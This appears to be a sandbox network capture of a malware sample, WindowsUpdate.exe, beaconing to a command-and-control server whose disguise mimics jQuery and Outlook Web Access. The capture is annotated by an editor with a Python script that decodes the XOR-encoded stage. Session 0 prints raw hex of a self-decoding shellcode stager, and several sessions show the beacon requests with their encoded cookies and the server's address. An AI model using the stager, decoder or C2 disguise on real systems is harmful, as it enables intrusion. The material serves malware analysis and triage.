Content-Length: 458323
Server: nginx
content-transfer-encoding: binary
2024-12-18 21:52:04 UTC | 8192 | IN | Data Raw: fc 48 83 e4 f0 eb 33 5d 8b 45 00 48 83 c5 04 8b 4d 00 31 c1 48 83 c5 04 55 8b 55 00 31 c2 89 55 00 31 d0 48 83 c5 04 83 e9 04 31 d2 39 d1 74 02 eb e7 58 fc 48 83 e4 f0 ff d0 e8 c8 ff ff ff 4f fe 5d 14 43 00 5b 14 df 6e cd 84 4f fe 80 de 0e ac d5 96 87 49 9d 17 6b 79 9d 17 6b 31 10 0a 81 ce ef f5 c9 47 30 bd 48 84 a0 46 48 84 5f 95 09 3c af 20 ab 6a c7 24 ab 6a c7 7e e3 e3 3e 81 33 e3 3e 81 33 e3 3e 81 33 e3 3e 80 33 e3 32 dd e2 13 75 36 d1 d4 31 5e 6a 5e 19 25 8d 13 b1 2b 3f 62 e9 e7 66 0b dd dc d3 2d b4 d9 28 96 7f 3d 98 4c 79 8a 9d 4a d8 c1 ed 38 b2 80 8d e4 cc 0d d9 62 e4 50 7b be e8 86 16 49 0d 70 bb 64 c5 15 44 8b 23 6c 16 33 75 ad 01 cd d1 a6 ed a4 90 c2 0c 77 54 68 2e 0c 26 f5 8d 2e 05 5b 72 ef e1 c3 f7 de 3f 97 66 da 63 ce fc 3d 17 c8 21 be 3e 9e
Data Ascii: H3]EHM1HUU1U1H19tXHO]C[nOIkyk1G0HFH_< j$j~>3>3>3>32u61^j^%+?bf-(=LyJ8bP{IpdD#l3uwTh.&.[r?fc=!>
2024-12-18 21:52:04 UTC | 8192 | IN | Data Raw: 03 71 4b 65 90 fa 8b ac 1b b2 b1 27 53 05 56 bc d8 4d 5d 8c bf c6 15 0b 58 55 5d 88 93 95 da 6f 30 1e 92 e0 d7 8d d8 62 1c 06 90 e5 fb 95 d8 66 30 d5 f3 ad 78 de d8 80 1a 1e 1b ca 9d f9 f8 41 d5 7e 1f d2 5e 36 dc 9a d1 d1 3f d0 5a 16 b4 90 5d ed 28 0d 5d e2 27 02 52 ed 28 0d 5d a7 bf ea 8e 2c f5 65 69 e7 7e 25 46 0c 36 aa a1 f7 1d c3 c3 37 de 89 44 d0 25 0b 3f 17 e6 c8 fc 9c a8 5f 1b 67 23 17 94 80 d0 3c 66 bc ec 00 ed fc eb eb ed f3 e4 e4 e2 fc eb eb ed f3 e4 e4 e2 56 ae 73 05 85 25 39 8a 62 ee b2 ca 4d 05 7e be c2 e2 85 95 6f 80 45 56 ca ca c2 b1 31 48 b9 70 f2 8b 7a fb bc 1c 9d 00 37 54 12 e7 c4 7f 3f da f8 43 b4 9a ff a8 b4 95 f0 a7 bb 9a ff a8 b4 95 78 e2 33 72 a3 69 79 e5 44 ba f2 af cb 5d 39 24 8b 72 c2 6c 45 c6 82 a9 86 ed 63 cb 46 2e 29 4c a1 cd
Data Ascii: qKe'SVM]XU]o0bf0xA~^6?Z](]'R(],ei~%F67D%?_g#<fVs%9bM~oEV1Hpz7T?Cx3riyD]9$rlEcF.)L
2024-12-18 21:52:04 UTC | 8192 | IN | Data Raw: 6f 0c a5 46 e4 42 22 a1 57 c9 6a 9a a7 ca 10 31 64 09 d3 01 0d 0d 54 e6 be a6 97 25 7d 2d d9 a2 9a b6 52 ea a1 46 51 90 7a 85 92 53 4a ec 19 57 cd 0b 92 94 0e c8 51 90 89 2f d2 4b 4a ec 11 4f cd 0b 82 8d 0e c8 41 0f 74 0b 82 dc b7 84 cc 5b 50 07 47 15 c7 e0 b4 9e 89 6f 53 65 b5 b9 13 70 72 7a 98 3e fd 9d 2b 02 2b 36 3e c5 e8 32 79 22 87 f1 ba e1 45 33 79 22 b5 30 dc 68 f2 d7 af ab 31 14 24 e3 b6 f3 d7 68 fc b4 30 63 3f 77 f3 e8 77 f0 14 1b fc ba 53 fc ef 79 90 3f 64 7d d7 d8 67 be 14 1b a4 7d d7 d8 a0 fa 30 33 63 39 f3 f0 67 be 14 13 b4 7d d7 d0 3b 33 58 37 a0 bc 16 b0 47 0f 5e e7 a0 e4 9c 24 63 6f d4 6b 84 8c 16 a8 47 a7 f2 fd 84 64 b4 fe 32 a5 9c 7c 4b 76 78 bf 88 fd 30 30 6f 66 0c e6 8d 73 cb 25 06 3d 8c c2 25 fe 4f 01 ae b0 c0 e6 35 3b 88 dd be 73 ba
Data Ascii: oFB"Wj1dT%}-RFQzSJWQ/KJOAt[PGoSeprz>++6>2y"E3y"0h1$h0c?wwSy?d}g}03c9g};3X7G^$cokGd2|Kvx00ofs%=%O5;s
2024-12-18 21:52:04 UTC | 8192 | IN | Data Raw: fd 18 60 cd 27 d9 a3 0e c1 dc e4 e9 18 1d 27 2a eb 18 60 cd 33 d9 a3 0e c2 dc e4 e9 1d 1d 27 2a ba 18 60 cd 64 d9 a3 0e 88 dc e4 e9 55 1d 27 2a b3 18 60 cd 6f d9 a3 0e 9c dc e4 e9 7f 1d 27 2a 8e 18 60 cd 6c d9 a3 0e cb dc e4 e9 2a 1d 27 2a c9 18 60 cd 29 d9 a3 0e cf dc e4 e9 28 1d 27 2a db 18 60 cd 3d d9 a3 0e cc dc e4 e9 29 1d 27 2a 8e 18 60 cd 6a d9 a3 0e 93 dc e4 e9 78 1d 27 2a 9e 18 60 cd 74 d9 a3 0e 87 dc e4 e9 6e 1d 27 2a 9f 18 60 cd 77 d9 a3 0e d0 dc e4 e9 3f 1d 27 2a c6 18 60 cd 28 d9 a3 0e ce dc e4 e9 23 1d 27 2a d0 18 60 cd 3c d9 a3 0e cd dc e4 e9 3e 1d 27 2a 99 18 60 cd 6b d9 a3 0e a1 dc e4 e9 50 1d 27 2a b6 18 60 cd 46 d9 a3 0e f6 dc e4 e9 01 1d 27 2a c8 18 60 cd 3e d9 a3 0e fd dc e4 e9 06 1d 27 2a 83 18 60 cd 79 d9 a3 0e b3 dc e4 e9 4a 1d 27
Data Ascii: `''*`3'*`dU'*`o'*`l*'*`)('*`=)'*`jx'*`tn'*`w?'*`(#'*`<>'*`kP'*`F'*`>'*`yJ'
2024-12-18 21:52:04 UTC | 8192 | IN | Data Raw: a1 bd e5 9d 60 7e 26 5e d6 b3 ad 16 51 54 3e 12 d2 8f fd d1 11 4c d5 3c 9a 48 52 db 71 8b 91 18 b2 8f 16 ff 51 4c d5 3c 92 c7 9d bb 75 54 12 f3 fe 9f 99 bb 79 78 0a 34 31 bb fa 25 c1 b1 71 6d 46 56 e2 51 d5 85 69 11 d2 0e 69 1e dd 81 23 99 3a 5a 69 0e dd 89 e2 44 52 6e 29 d1 c6 e5 69 fe 5d 6e 27 38 7b 52 1b 04 f0 1c d5 99 cc 20 e9 12 24 22 a3 95 c3 d1 28 91 44 36 a3 52 87 f5 60 1a 00 12 93 91 40 11 70 db c7 f6 87 93 40 11 74 18 00 12 97 93 48 19 bc ba d6 d9 7f 31 9c 5e 98 ca 17 16 27 2d ec 9d 6f 5a 0b de ac 99 c8 a4 4f 5a 0b 67 7f 3d 43 e0 98 ce c8 a8 17 29 33 23 57 2b d0 a8 19 fd 16 94 25 c1 9d dc 1f 4a d5 ed 57 41 e5 8a 1f c6 02 7d 1b 41 e5 9e 98 82 26 5d 1a f8 e5 ae d9 3b 62 e6 da cb 73 6d 92 44 94 de ae 92 2e 89 69 51 a5 c3 ee b6 26 48 ae 09 c1 cb 6d
Data Ascii: `~&^QT>L<HRqQL<uTyx41%qmFVQii#:ZiDRn)i]n'8{R $"(D6R`@p@tH1^'-oZOZg=C)3#W+%JWA}A&];bsmD.iQ&Hm
2024-12-18 21:52:04 UTC | 8192 | IN | Data Raw: 1e 65 f7 93 98 95 f4 63 89 1e bc 68 06 56 33 8f 95 dd 7b 08 72 46 f9 34 e5 84 1a 7e 62 63 f5 3e dd 84 1a fd 6b 51 91 b5 3c b6 f2 76 ff 75 ba f9 18 9e 91 6c de 5d 52 46 03 9f 91 85 88 d7 57 ac 6e 12 94 e4 e1 f5 67 ae 2a 7e c7 29 cd 9d 4c 81 ce 3e c7 cf 00 19 21 0a c3 92 6f 8d 01 59 e4 2d 8e be 07 a6 26 b4 a4 2d 6c 3b 43 86 e7 75 95 8f 01 b0 56 04 4b 27 b1 a7 32 04 e1 60 f1 8f a9 6b 7e c7 2e 8c dd 4c 66 0b 3a e7 e4 37 ad 24 1f 71 ae 93 84 fa e6 55 d4 1c 23 96 5f 5c 20 51 d4 fc af b6 37 77 07 bc 94 fc 49 6a d8 1a 8c a9 53 54 03 60 98 df a3 f7 7f 3c 28 5f 6e 9f a3 15 f9 78 18 9a b7 be ae 7c 72 7d 21 36 f5 9a 92 b4 8e a5 ae 78 4d 2e e6 6b c2 66 69 8c 71 ed 21 0b 96 56 a3 37 01 94 78 7d 86 73 9f 55 4d 77 18 b2 aa 4b 24 8e 96 0b 9b 69 71 c8 26 8b fa 68 a1 6c 1d
Data Ascii: echV3{rF4~bc>kQ<vul]RFWng*~)L>!oY-&-l;CuVK'2`k~.Lf:7$qU#_\ Q7wIjST`<(_nx|r}!6xM.kfiq!V7x}sUMwK$iq&hl
2024-12-18 21:52:04 UTC | 8192 | IN | Data Raw: 67 b4 c6 a2 68 bb c9 ad 67 b4 c6 a2 68 3b 8c 25 8f e0 c6 b2 68 33 4d f8 e7 d4 86 6d 73 5f c4 42 c8 98 07 81 43 d0 c1 60 7b 16 02 eb 8b 11 89 a1 cc f6 2a 66 0f 35 a1 62 88 d2 5a a1 4b 11 99 2a 4f 96 7e d9 73 aa 42 e5 77 2d a5 0e b4 ee 66 cd b0 69 81 2a 73 aa 42 e9 83 a9 e7 a3 04 4e 04 a7 83 a9 eb 64 40 6a 28 60 c7 8d ab a2 04 4e 68 29 4c 09 8f 7a 8b ca 4c 32 48 80 cb d5 a3 0b 83 92 44 58 44 51 87 d3 04 52 40 58 4e 15 a7 0b 89 d6 64 80 29 91 83 db ee 52 40 50 ae 79 87 1a e9 9e dc dd 2a 5d 94 5a cd b6 de dd 2a 51 96 52 cd ba aa 84 01 20 6d 47 4b a7 8a ac c0 ef cd 4b 93 28 0e 88 5f 5c cd 2d 15 db 2a ce 9e 93 6d 29 cd 54 ae ea 46 14 ad 2b cd 5e ea cc 9e 99 29 0f 15 39 6e e8 4e fe ad 2b c5 be 86 ea 8f f9 61 b1 48 3a a2 7d 3c b5 45 9e 00 63 37 05 c7 a0 92 4f 40
Data Ascii: ghgh;%h3Mms_BC`{*f5bZK*O~sBw-fi*sBNd@j(`Nh)LzL2HDXDQR@XNd)R@Py*]Z*QR mGKK(_\-*m)TF+^)9nN+aH:}<Ec7O@
2024-12-18 21:52:04 UTC | 8192 | IN | Data Raw: 5b 3c 94 8a 9b ff 57 01 d5 b8 b0 32 16 7b 73 b9 5e 40 83 ba 24 83 44 79 e7 b3 2d fb 9c 70 ea 38 5f fb a4 6f b8 c8 67 ac 7b 43 29 e3 9c 00 ea 20 5f 2b 4e 3f 63 17 04 b8 84 e0 8f f6 c3 07 bc 35 00 c4 37 7f 87 23 d4 f4 cf 64 33 2f 09 a7 f0 a0 41 6c 7f ee 87 ab 75 28 44 d2 b6 ef 87 11 3d a7 c0 f6 e6 61 03 35 6d 29 88 c6 46 c8 63 fa 7a 43 2b bd 9d 98 ed 7e 5e 13 a5 fd ad 98 ed b2 4a 43 2b 71 89 c8 63 bb 02 80 59 30 4a b3 23 f3 8d 70 e0 c3 ea 5a 15 03 29 99 9e 4d 6e 7e ad 8e ad bd 26 c6 96 4d 25 bc 55 8a e6 7f 65 e3 64 04 a6 24 a7 c7 2d 6a f0 20 1e a9 33 e3 95 e7 7c 04 d6 24 bf c7 fd 31 a7 fb c1 7b 20 1c 36 f0 60 a3 d1 7b a3 14 66 f0 eb 93 81 7b 60 d9 c6 9c 73 1a 05 5f f8 1e 82 b8 4b 22 be 84 77 a9 82 03 90 1a 09 4b d7 fd 1a 88 14 3e 91 c0 9b d9 22 83 64 12 e1
Data Ascii: [<W2{s^@$Dy-p8_og{C) _+N?c57#d3/Alu(D=a5m)FczC+~^JC+qcY0J#pZ)Mn~&M%Ued$-j 3|$1{ 6`{f{`s_K"wK>"d
2024-12-18 21:52:04 UTC | 8192 | IN | Data Raw: 34 47 42 2f 82 47 c1 d7 e3 3b de 9f 68 7f fa af 67 c9 fa 2c 8f e9 b2 b4 c7 62 fe 90 e7 2a fd 58 af a1 3c 10 26 e5 18 30 cd fd 50 bb 89 d9 60 b4 3f d9 28 3f 73 fd 08 77 70 35 40 fc b1 7d c9 b8 95 5d 81 33 d1 79 b1 7b 2e b9 f9 f2 6a 9d c9 fd dd 99 ed 9b 22 51 8b 12 26 75 84 a5 22 51 01 65 57 df 80 19 73 ff db a5 39 95 ae a7 d2 87 e6 2c 96 a3 ce 64 1d a3 86 ed 59 87 ae 04 19 78 51 fb 51 f3 15 df 79 bb 9e 9f 59 f3 17 db 7d fb 5f 50 39 df 57 18 5a 9f 6b 50 d1 d3 4f 58 99 d0 87 10 12 11 cf 99 56 35 f7 21 5e 35 f7 21 16 5e 37 21 5e d5 7b 05 66 9d f6 81 67 15 f6 81 67 5d 7f c5 43 1d 37 4e 07 39 77 c5 07 71 fc 89 23 79 b4 8a eb 31 3f 4b a3 b8 7b 6f 9b f0 f0 2b bf c8 7b 6b 9f 80 f0 27 bb 88 b8 24 73 c0 33 e5 3b 49 77 c1 7b 01 fc 85 5f 39 77 c5 7b 71 fc 89 5f 79 b4
Data Ascii: 4GB/G;hg,b*X<&0P`?(?swp5@}]3y{.j"Q&u"QeWs9,dYxQQyY}_P9WZkPOXV5!^5!^7!^{fgg]C7N9wq#y1?K{o+{k'$s3;Iw{_9w{q_y
2024-12-18 21:52:04 UTC | 8192 | IN | Data Raw: 80 59 7f 36 b2 23 ac f5 71 e0 9c 92 f3 9b df 51 30 58 54 1f e6 c7 22 d9 25 4c 6c 17 6b 3a aa d4 40 01 54 17 83 4b d3 f0 70 0b 6c 17 83 c8 db de f9 0a 18 1d 3a 21 9c 01 fb e2 17 a1 bc 05 5c 62 7f c6 d7 2a 30 21 94 e9 f3 e2 1f a3 7c 05 f4 28 34 4a 13 6b f7 89 d0 e0 bd 06 37 03 32 48 b8 e4 b1 c7 f0 e7 c8 05 33 24 0b 8e 7d ea f5 f8 bb 29 de 13 4a ea 1d 59 cd 0d ee 19 72 ea 1d da c5 23 67 18 06 e0 a4 33 32 fd 65 f0 1a 26 a9 8c dc 3f de 4a 1f 7f e5 88 a9 be cd 41 d3 7c 0e 82 10 57 10 9f d1 94 9b 3f 96 73 d0 fc 55 b0 5b b4 1a 57 18 77 d9 94 93 b7 d2 1f db b5 59 51 54 52 a2 da 1e dd 45 31 95 97 c2 d6 76 10 8a 99 91 5b 49 5a 52 d4 01 1d b5 97 c2 de 76 ee 11 1d b5 2d 9a 53 7b 4e ed 95 b8 65 ed a6 84 59 a7 21 63 aa e7 9e 84 59 24 29 4d 23 e6 ea 8e e0 cd ab 93 21 0e
Data Ascii: Y6#qQ0XT"%Llk:@TKpl:!\b*0!|(4Jk72H3$})JYr#g32e&?JA|W?sU[WwYQTRE1v[IZRv-S{NeY!cY$)M#!
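Reading session 0: the request asks for `jquery-3.6.2.slim.min.js`, but the reply is `application/octet-stream` from `nginx` and its first bytes are not JavaScript. They disassemble to x86-64 code (`fc` cld, `48 83 e4 f0` and rsp,-16, `eb 33` jmp) forming a short self-decoding stub: after a call/pop trick to find its own data it reads a 4-byte key, a body length masked with that key, and then decodes the body with a chained XOR in which each ciphertext dword becomes the key for the next one before jumping into the result. The Python below is an editor's example added to this page, not part of the Joe Sandbox report. It parses the stub from the bytes shown in the first `Data Raw` line above, checks that stub, key, length field and declared body length add up to the response's `Content-Length` of 458323, and decodes the part of the body that is actually on the page. The decoded bytes start with six NOPs and then `MZARUH\x89\xe5`: an MZ header whose first bytes are also valid instructions, the reflective-DLL stage layout commonly associated with Cobalt Strike Beacon. The report itself does not name a family, so that attribution is the editor's assessment, and because only the first 255 bytes of the 458323-byte body are shown, the full payload cannot be recovered from the page.

```python
"""Parse and partially decode the self-decoding stage served in session 0."""
import struct

CONTENT_LENGTH = 458323  # Content-Length from the session 0 response headers

# First 255 bytes of the response body, copied from the first "Data Raw" line
# of session 0 (page data, not constructed). The rest of the body is not shown.
FIRST_CHUNK = bytes.fromhex("""
fc 48 83 e4 f0 eb 33 5d 8b 45 00 48 83 c5 04 8b
4d 00 31 c1 48 83 c5 04 55 8b 55 00 31 c2 89 55
00 31 d0 48 83 c5 04 83 e9 04 31 d2 39 d1 74 02
eb e7 58 fc 48 83 e4 f0 ff d0 e8 c8 ff ff ff 4f
fe 5d 14 43 00 5b 14 df 6e cd 84 4f fe 80 de 0e
ac d5 96 87 49 9d 17 6b 79 9d 17 6b 31 10 0a 81
ce ef f5 c9 47 30 bd 48 84 a0 46 48 84 5f 95 09
3c af 20 ab 6a c7 24 ab 6a c7 7e e3 e3 3e 81 33
e3 3e 81 33 e3 3e 81 33 e3 3e 80 33 e3 32 dd e2
13 75 36 d1 d4 31 5e 6a 5e 19 25 8d 13 b1 2b 3f
62 e9 e7 66 0b dd dc d3 2d b4 d9 28 96 7f 3d 98
4c 79 8a 9d 4a d8 c1 ed 38 b2 80 8d e4 cc 0d d9
62 e4 50 7b be e8 86 16 49 0d 70 bb 64 c5 15 44
8b 23 6c 16 33 75 ad 01 cd d1 a6 ed a4 90 c2 0c
77 54 68 2e 0c 26 f5 8d 2e 05 5b 72 ef e1 c3 f7
de 3f 97 66 da 63 ce fc 3d 17 c8 21 be 3e 9e
""")

# Stub as disassembled from the bytes above (63 bytes, offsets 0x00-0x3e):
#   fc / 48 83 e4 f0 / eb 33      cld; and rsp,-16; jmp get_data
#   5d                            pop rbp          ; rbp -> key, len, body
#   8b 45 00 / 48 83 c5 04        mov eax,[rbp]; add rbp,4        ; eax = key
#   8b 4d 00 / 31 c1 / 48 83 c5 04  mov ecx,[rbp]; xor ecx,eax; add rbp,4 ; ecx = len
#   55                            push rbp         ; remember body start
#   loop: mov edx,[rbp]; xor edx,eax; mov [rbp],edx; xor eax,edx
#         add rbp,4; sub ecx,4; xor edx,edx; cmp ecx,edx; je done; jmp loop
#   done: 58 / fc / 48 83 e4 f0 / ff d0   pop rax; cld; and rsp,-16; call rax
#   get_data: e8 c8 ff ff ff      call back to `pop rbp`; data follows here


def locate_data(blob):
    """Follow the stub's control flow to the [key][len][body] area.

    Offset 5 holds a short jmp to a 5-byte call back into the decoder;
    the call's return address (popped into rbp) is where the data begins.
    """
    if blob[0] != 0xFC or blob[5] != 0xEB:
        raise ValueError("not the expected cld/and/jmp stub prologue")
    call_at = 7 + blob[6]  # rel8 target of the jmp at offset 5
    if blob[call_at] != 0xE8:
        raise ValueError("jmp target is not a call")
    return call_at + 5  # return address of the call == start of data


def parse_stage(blob):
    off = locate_data(blob)
    key, stored_len = struct.unpack_from("<II", blob, off)
    return {
        "data_offset": off,
        "key": key,
        "length": stored_len ^ key,  # the stub's `xor ecx, eax`
        "body": blob[off + 8:],      # encoded body (only partially present)
    }


def expected_content_length(stage):
    """Stub + key + length dword + body should equal the HTTP Content-Length."""
    return stage["data_offset"] + 8 + stage["length"]


def decode_chained_xor(enc, key):
    """Replay the stub's loop: plain = word ^ key; key ^= plain (so key = word)."""
    out = bytearray()
    usable = len(enc) - len(enc) % 4  # the stub only ever works on whole dwords
    for (word,) in struct.iter_unpack("<I", enc[:usable]):
        out += struct.pack("<I", word ^ key)
        key = word
    return bytes(out)


def dos_e_lfanew(decoded, mz_offset):
    """PE header offset read from the decoded MZ header that starts at mz_offset."""
    return struct.unpack_from("<I", decoded, mz_offset + 0x3C)[0]


def summarize(blob=FIRST_CHUNK, content_length=CONTENT_LENGTH):
    st = parse_stage(blob)
    dec = decode_chained_xor(st["body"], st["key"])
    mz = dec.find(b"MZ")
    return {
        "data_offset": st["data_offset"],
        "key": hex(st["key"]),
        "declared_length": st["length"],
        "length_matches_http": expected_content_length(st) == content_length,
        "decoded_prefix": dec[:16].hex(" "),
        "mz_offset": mz,
        "e_lfanew": dos_e_lfanew(dec, mz) if mz >= 0 else None,
    }


if __name__ == "__main__":
    for name, value in summarize().items():
        print(f"{name}: {value}")
```

The length check is the useful part for triage: a self-describing stub whose declared body length lands exactly on the HTTP `Content-Length` rules out truncation and tells you the whole 458 KB response is one encoded stage rather than a script with a binary tail. Anyone with the full response body can feed it to `decode_chained_xor` to recover the complete DLL.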


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49732 | 146.56.219.146 | 443 | 6652 | C:\Users\user\Desktop\WindowsUpdate.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-18 21:52:07 UTC | 431 | OUT | GET /assets/code-3d7b701fc6eb.css HTTP/1.1
Accept: */*
Content-Language: de-DE, en-CA
Cookie: SESSIONID=Kc01eAbdRHb9U2QSQjyhjBzp8wpgpWi0WoW2o0mJHNpt++RXy2N1dW8vFiYB7dYGdX3BcAwwZyvWBh+JFOCF8x5OSlLRiJHSB2gqQOLpR/9CZIJ4RysR0EjhWLeLSgoZOq+//1c7BsaejloBxcA9OnF8Yk+2o9seJUpnTPZkQiY=
User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0)
Host: 146.56.219.146
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-18 21:52:07 UTC | 595 | IN | HTTP/1.1 200 OK
Date: Wed, 18 Dec 2024 21:52:07 GMT
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/9.5
request-id: aad7f3fc-c5eb-4341-af6f-700981ac2539
X-CalculatedBETarget: BN3PR0701MB1156.namprd07.prod.outlook.com
X-Content-Type-Options: nosniff
X-OWA-Version: 14.1.1240.20
X-OWA-OWSVersion: V2017_06_15
X-OWA-MinimumSupportedOWSVersion: V2_6
X-Frame-Options: SAMEORIGIN
X-DiagInfo: BN4PR1812MB2267
X-UA-Compatible: IE=EmulateIE9
X-Powered-By: ASP.NET
X-FEServer: CY4PR02CA0010
Connection: close
Content-Length: 5537
2024-12-18 21:52:07 UTC | 5537 | IN | Data Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
Data Ascii: /*! jQuery v3.6.0 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49733 | 146.56.219.146 | 443 | 6652 | C:\Users\user\Desktop\WindowsUpdate.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-18 21:52:14 UTC | 431 | OUT | GET /assets/code-3d7b701fc6eb.css HTTP/1.1
Accept: */*
Content-Language: de-DE, en-CA
Cookie: SESSIONID=Kc01eAbdRHb9U2QSQjyhjBzp8wpgpWi0WoW2o0mJHNpt++RXy2N1dW8vFiYB7dYGdX3BcAwwZyvWBh+JFOCF8x5OSlLRiJHSB2gqQOLpR/9CZIJ4RysR0EjhWLeLSgoZOq+//1c7BsaejloBxcA9OnF8Yk+2o9seJUpnTPZkQiY=
User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0)
Host: 146.56.219.146
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-18 21:52:15 UTC | 595 | IN | HTTP/1.1 200 OK
Date: Wed, 18 Dec 2024 21:52:15 GMT
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/9.5
request-id: aad7f3fc-c5eb-4341-af6f-700981ac2539
X-CalculatedBETarget: BN3PR0701MB1156.namprd07.prod.outlook.com
X-Content-Type-Options: nosniff
X-OWA-Version: 14.1.1240.20
X-OWA-OWSVersion: V2017_06_15
X-OWA-MinimumSupportedOWSVersion: V2_6
X-Frame-Options: SAMEORIGIN
X-DiagInfo: BN4PR1812MB2267
X-UA-Compatible: IE=EmulateIE9
X-Powered-By: ASP.NET
X-FEServer: CY4PR02CA0010
Connection: close
Content-Length: 5537
2024-12-18 21:52:15 UTC | 5537 | IN | Data Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
Data Ascii: /*! jQuery v3.6.0 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49736 | 146.56.219.146 | 443 | 6652 | C:\Users\user\Desktop\WindowsUpdate.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-18 21:52:21 UTC | 431 | OUT | GET /assets/code-3d7b701fc6eb.css HTTP/1.1
Accept: */*
Content-Language: de-DE, en-CA
Cookie: SESSIONID=Kc01eAbdRHb9U2QSQjyhjBzp8wpgpWi0WoW2o0mJHNpt++RXy2N1dW8vFiYB7dYGdX3BcAwwZyvWBh+JFOCF8x5OSlLRiJHSB2gqQOLpR/9CZIJ4RysR0EjhWLeLSgoZOq+//1c7BsaejloBxcA9OnF8Yk+2o9seJUpnTPZkQiY=
User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0)
Host: 146.56.219.146
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-18 21:52:22 UTC | 595 | IN | HTTP/1.1 200 OK
Date: Wed, 18 Dec 2024 21:52:22 GMT
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/9.5
request-id: aad7f3fc-c5eb-4341-af6f-700981ac2539
X-CalculatedBETarget: BN3PR0701MB1156.namprd07.prod.outlook.com
X-Content-Type-Options: nosniff
X-OWA-Version: 14.1.1240.20
X-OWA-OWSVersion: V2017_06_15
X-OWA-MinimumSupportedOWSVersion: V2_6
X-Frame-Options: SAMEORIGIN
X-DiagInfo: BN4PR1812MB2267
X-UA-Compatible: IE=EmulateIE9
X-Powered-By: ASP.NET
X-FEServer: CY4PR02CA0010
Connection: close
Content-Length: 5537
2024-12-18 21:52:22 UTC | 5537 | IN | Data Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
Data Ascii: /*! jQuery v3.6.0 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


